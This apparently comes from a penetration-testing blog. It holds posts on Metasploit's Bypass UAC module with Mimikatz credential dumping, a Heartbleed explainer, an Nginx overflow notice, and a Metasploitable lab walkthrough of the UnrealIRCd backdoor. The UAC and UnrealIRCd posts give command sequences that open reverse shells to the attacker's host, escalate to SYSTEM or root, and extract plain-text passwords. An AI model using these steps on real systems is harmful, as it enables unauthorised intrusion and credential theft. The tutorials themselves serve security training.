System level Access and Plain Text Passwords using Bypass UAC and Mimikatz

If you can get a remote shell during a penetration test, Metasploit’s Bypass UAC module is great for disabling that pesky UAC and escalating an account with admin privileges to the all powerful System level access. The problem is it doesn’t seem to work anymore – so let’s see what changed and get some plain text passwords while we are at it!

Its been a while since I have used Metasploit’s Bypass UAC module and when I went to use it recently, it kept erroring out. Once you had a remote shell with Metasploit all you used to have to do was call the Bypass UAC module, set the session number of the active session and run it. The solution is simple, the module usage has changed slightly.

We will start with an active session to a Windows 7 system:

BypassUAC Metasploit 1

From here, enter:

  • use exploit/windows/local/bypassuac_injection
  • set session 1
  • set payload windows/meterpreter/reverse_tcp
  • set lhost [Kali’s IP Address]
  • set lport 4545 (Important: use a different port from one used for original shell)
  • exploit

This should execute the Bypass UAC module, creating a new session with UAC disabled:

BypassUAC Metasploit 2

Now if we type “getsystem” it should work, as verified by “getuid”:

BypassUAC Metasploit 3

Now that we have a System level shell, what can we do?

Pretty much anything we want. Recover clear text passwords you say? Sure!

Type, “load kiwi“:

BypassUAC Mimikatz 4

Then type, “creds_all“:

BypassUAC Mimikatz 5

Oh look, user “Dan” is using the hyper secure password of “password” – Yikes, not good!

Bypass UAC is now a full exploit module, which means that you need to actually set a payload for it. I recommend using the same one that you got the original shell with. But make sure that when you set up the payload for Bypass UAC that you select a different port number for it to use or it will error out. So on mine, the port used to create session one was 4444, so I chose port 4545 for the UAC exploit.

Lastly, once we had the second shell created by Bypass UAC, we quickly elevated our privileges to system level with the “getsystem” command. Lastly, we used the amazing Mimikatz “Kiwi” extension to grab the plain text passwords for the win!

Want to learn how to use Metasploit and a whole lot more? Check out my book, “Basic Security Testing with Kali Linux” – Also a follow up book is coming out very soon!

Advertisements

OpenSSL “Heartbleed” – Whose Vulnerable and How to Check

** Updated 4/9/14 9pm **

The internet is plastered with news about the OpenSSL heartbeat “Heartbleed” (CVE-2014-0160) vulnerability that some say effects up to 2/3 of the internet. Everything from servers to routers to smart phones could be tricked to give up encrypted data in plain text. Let’s take a quick look at the vulnerability, see who’s affected by it and how you can check.

What is Heartbleed?

Basically, OpenSSL is an encryption library used in HTTPS communication – You know the online stores and banking websites that give you that little lock icon in your browser bar when you visit them.

OpenSSL uses a “heartbeat” message to echo back data to verify what was received was correct. In OpenSSL 1.0.1 to 1.0.1f, a hacker can trick OpenSSL by sending a single byte of information but telling the server that it sent 64K bytes of data.

And the server will respond with 64K bytes of information – from it’s memory!

The Register has a nice image of the process:

OpenSSL heartbleed

The data returned is randomly pulled from the server’s memory and can include anything from Usernames, account passwords or sensitive data.

The vulnerability is remedied in the latest update of OpenSSL, but the problem is it could take years for all the affected devices to be found and patched. And some embedded and proprietary devices may never be patched!

There are a plethora of tools and exploits flooding the internet right now to check for and exploit Heartbleed.

Who is Vulnerable?

Yesterday the top 10,000 websites on the web were scanned for the vulnerability and the results can be found here. Many big named websites (as of yesterday) are vulnerable. But many listed, including Yahoo! have already fixed the vulnerability.

But if you read down the list you will see familiar websites including technology sites, financial institutions, game websites and popular forum/ social media sites.

But it just not limited to these sites.

Many home routers and even smart devices use OpenSSL.

How to Exploit/ Check?

I received a note today from Tenable (see Blog Post Here) that Nessus will now detect the Heartbeat vulnerability:

“Tenable Network Security® released plugins for the detection of the OpenSSL heartbeat vulnerability (aka the “Heartbleed Vulnerability”) on the 8th of April for Nessus® and the Passive Vulnerability Scanner™ (PVS™). A plugin for detecting the vulnerability in Apache web server logs has also been added to the Log Correlation Engine™ (LCE™) and available for reporting in SecurityCenter™ and SecurityCenter Continuous View™.”

And a quick Google search will return multiple different ways to check to see if websites are vulnerable to the attack. I have even seen a Firefox add in floating around:

foxbleed

There are a couple exploit programs available on the web. Rapid7 has created an exploit module for Metasploit and it is available on Github:

heartbleed ruby

I didn’t see it available in the latest msfupdate, but I am sure it will be added to Metasploit Framework very soon.

As always, use any Heartbleed tools at your own risk, use extreme caution when using random programs to check for vulnerabilities, and never use these tools to check websites that you do not own or have permission to test or to access.

Update any of your systems that are using the old version of OpenSSL, and change your passwords on any effected servers.

Buffer Overflow Exploit found in Nginx Server 1.3.9-1.4.0

Nginx Logo

Earlier this month Nginx disclosed that there was a buffer exploit vulnerability in some versions of their product. Recently, Metasploit released an exploit module for the vulnerability.

Nginx, the ever popular opensource HTTP Server and Proxy publicly disclosed that a Buffer Overflow was discovered in versions 1.3.9 – 1.4.0. According to Shodan there are almost 3 million servers on the web that use Nginx with almost 12,000 running the affected versions.

A notification from Nginx stated that a specially crafted request could trigger a stack-based buffer overflow:

Nginx

The exploit released by Metasploit can take advantage of the overflow to run a payload that could include a remote shell:

This module exploits a stack buffer overflow in versions 1.3.9 to 1.4.0 of nginx. The exploit first triggers an integer overflow in the ngx_http_parse_chunked() by supplying an overly long hex value as chunked block size. This value is later used when determining the number of bytes to read into a stack buffer, thus the overflow becomes possible.

The issue has been fixed in Nginx 1.4.1 & 1.5.0 and a patch is available (see Nginx announcement above).

Metasploitable 2.0 Tutorial Part 3: Gaining Root from a Vulnerable Service

Continuing our tutorial series on Metasploitable 2, the purposefully vulnerable virtual machine used to learn security techniques, this time we will look at how to get root access from a vulnerable service.

We saw in previous tutorials how to scan a system for open ports with Nmap, and how to use Metasploit’s built in scanners to identify software revision levels.

I alluded to it earlier, so let’s take a look at UnrealIRCD sitting at port 6667. I chose this service for a few reasons. First of all there are numerous Metasploitable how-to’s out there, but a lot of them focus on the standard services. Secondly, in real life, which is the service that will most likely go unpatched? The main web server or some secondary service that was installed for a project and then forgotten about?

So let’s get started!

From the nmap scan we saw this output for Unreal ircd:

Let’s take the version number and do a search to see if there are any vulnerabilities or exploits that we can take advantage of. We can search the web, or we can search inside Metasploit using the “search” command. Let’s look at both!

First a quick Google search for “Unreal3.2.8.1 exploit” returns this:

Cute, this version of UnrealIRCD had a backdoor added to it. Well I think this is definitely worth trying, especially as it has an “Excellent” Metasploit rank, which basically means the exploit is very stable and works consistently. The exploit to use is listed further down Metasploit’s webpage, but we could find it by using the “Search” command in the Metasploit Framework as below:

As you can see there is only the one exploit in Metasploit for UnrealIRCD and it is the 3.2.8.1 backdoor exploit.

Excellent!

So, let’s “use” it and check the options:

All it needs is the remote host address:

set RHOST 192.168.12.20 (Metasploitable’s IP address)

Don’t forget to choose a payload for the exploit:

This command lists all the payloads that are compatible with this exploit. Unfortunately they are all command shell’s. A Meterpreter shell would be better than a command shell, and give us more options, but for now we will just use the generic reverse shell. This will drop us right into a terminal shell with the target when the exploit is finished.

set PAYLOAD generic/shell_reverse_tcp

For this payload all we need to do is set the LHOST command (the IP of our Backtrack Metasploit system) and then do a final “show options” to make sure everything is set okay:

Our RHOST (target) and LHOST (Attacker system that the shell will connect to) values are correctly set.

We are golden, now just type “exploit”:

Notice it says that a session is opened, but then it just gives you a blinking cursor. You are actually sitting in a terminal shell with the target machine. As you can see above, I typed “whoami” and the target system responded with “root”. The “Root” user is the highest level user that you can be on a Linux machine! It worked!

So to re-cap, we found an open service on the target machine. Searched for and found an exploit that works on the software version present. And finally, used the exploit and obtained a full remote shell.

All the standard Linux commands work with our shell that we have. But if you poke around a little bit, you will find that you are in the /etc/unreal directory (use the “pwd” command).  And it will not allow you out of this directory. Odd, but don’t forget that we are the Root user! We can make new users, or do almost anything else that we want.

* Update – Ran this using a different shell as a payload and was able to surf the directory structure without problems.

In the next tutorial I will show you how to grab information from the Linux machine using our foothold that will allow us to access other existing accounts and further exploit the system.

Until next time!